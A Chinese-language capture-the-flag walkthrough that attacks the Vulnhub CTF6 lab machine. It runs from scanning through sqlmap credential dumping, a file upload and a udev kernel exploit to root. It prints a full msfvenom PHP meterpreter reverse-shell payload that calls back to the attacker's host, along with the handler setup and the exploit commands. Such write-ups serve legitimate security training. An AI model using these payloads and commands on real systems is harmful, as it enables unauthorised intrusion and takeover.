Vulnhub-CTF6靶机实战

前言

靶机下载地址：下载地址

KALI地址：192.168.10.73

靶机地址：192.168.10.40

一.信息收集

1.主机发现

使用命令如下，来进行主机发现

netdiscover -r 192.168.10.73

如下图发现了靶机地址

2.主机扫描

这使用的是nmap命令来进行的主机扫描，如下命令

nmap -A -T4 -p- 192.168.10.40

如下图，扫描结果，发现开放了很多端口

3.目录扫描

既然扫描端口开放了80端口，那么肯定是网站，那么二话不说直接来一通目录扫描，使用命令如下

dirb http://192.168.10.40

如下图，扫出来很多目录，红色箭头是我自己觉得可能很重要的目录

4.网页信息收集

我们打开网站首页发现类似于文章的页面，并且有login，证明可以登录，然后每篇文章都可以点Read More，但是点进去之后，发现上面URL地址，是id出头的，经过测试可以更换后面的数字进行文章跳转，如果在后面加一个其他字符，就不能跳转了，猜测可能有SQL注入，如下图。

根据上面信目录扫描，发现了一个邮件系统，如下图，可能有用

然后我们访问doc目录，发现了一个压缩包可以下载下来,并且里面还有一个phpinfo，可以看看php版本

我们访问sql目录，发现了一个文件，并且文件里面有密码和用户泄露，可能有用，如下图

然后根据目录扫描还发现了phpmyadmin如下图，可能后面有用

二.漏洞利用

1.SQL注入

根据上面网页信息收集，发现文章id可能有SQL注入，我们直接使用sqlmap一把梭试试看，如下命令

python sqlmap.py -u "http://192.168.10.40/?id=1" --dbs

如下图，爆破出了所有的数据库，这里就觉得cms数据库可疑就他了。

所以一路凭感觉就发现了账户密码，使用命令如下。

python sqlmap.py -u "http://192.168.10.40/?id=1" -D cms -T user -C user_username,user_password --dump

如下图，发现了账户密码，和上面网页信息收集的时候发现的账户密码一直对应了，这里猜测是后台登录密码和账户，正好首页有一个登录框。

账户：admin

密码：adminpass

2.文件上传

根据上面SQL注入获取到的密码账户，成功登录到了后台，然后在Add Event选项，发现了上传选项！！！这不得上传？如下图。

然后经过测试，发现这里上传根本没有过滤，直接上传php文件即可，这里我们打开KALI，输入命令如下来生成一个php木马。

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.73 LPORT=4444 -f raw

生成的木马代码如下

*<?php /**/ error_reporting(0); $ip = '192.168.10.73'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

然后我们在再msf里面打开监听，操作流程如下

┌──(root㉿kali)-[~/Desktop]
└─# msfconsole                                                                   _---------..' #######   ;.".---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;`.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'"--'.@@@  -.@        @ ,'-   .'--"".@' ; @       @ `.  ;'|@@@@ @@@     @    .' @@@ @@   @@    ,`.@@@@    @@   .                                                                         ',@@     @   ;           _____________                                                 (   3 C    )     /|___ / Metasploit! \                                                ;@'. __*__,."    \|--- \_____________/                                                '(.,...."/                                                                           =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]Metasploit tip: View all productivity tips with the
tips commandmsf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options Module options (exploit/multi/handler):Name  Current Setting  Required  Description----  ---------------  --------  -----------Payload options (generic/shell_reverse_tcp):Name   Current Setting  Required  Description----   ---------------  --------  -----------LHOST                   yes       The listen address (an interface may be specified)LPORT  4444             yes       The listen portExploit target:Id  Name--  ----0   Wildcard Targetmsf6 exploit(multi/handler) > set LHOST 192.168.10.73
LHOST => 192.168.10.73
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.10.73:4444

之后我们再把生成的木马的代码，放进一个php文件里面然后直接上传上去即可，如下图

怎么找到路径呢，我们回到首页，然后如下图所示打开即可

打开之后，发现就成功反弹了meterpreter如下图。

三.提权

来到了后台，再meterpreter的地方输入shell来获取一个控制台，然后输入命令whereis python来查找靶机是否有python，发现是有的然后再输入python -c "import pty; pty.spawn('/bin/bah')"来获取一个新的binbash，如下图。

之后就可以再靶机里面找信息，查看是否有提权的可能，经过一番查找(指的是找了半小时)，发现再系统层面，系统内核是2.6！！！，如下图，查看命令是uname -a。

1.udev提权

udev漏洞针对的是linux2.6的内核，正好靶机是这个内核，所以这里可以使用udev漏洞来进行提权，首先我们去kali搜索是否拥有这个提权文件，发现是有的，搜索命令是searchsploit udev,如下图。

然后我们把这个文件复制到桌面，使用命令如下。

cp /usr/share/exploitdb/exploits/linux/local/8478.sh ./

然后我们使用meterpreter来把文件上传到靶机的/tmp文件夹，命令是upload /root/Desktop/8478.sh /tmp，需要在meterpreter的命令行输入，如果从shell回到meterpreter的命令行只需要按ctrl +c即可，然后方便做下一步操作，如下图。

回到靶机，cd到tmp文件夹，发现提权文件已经在里面了，我们现在只需要给文件赋予777权限，命令是chmod 777 8478.sh

然后我们在查看一下udev id查看命令是ps -ef |grep udev，如下图，发现是568

之后我们执行文件的时候加上这个id即可提权，如下图提权成功，命令是./8478.sh 568

如下图提权，成功，发现id变成了root，并且$变成了#，完成！

四.总结

udev提权很重要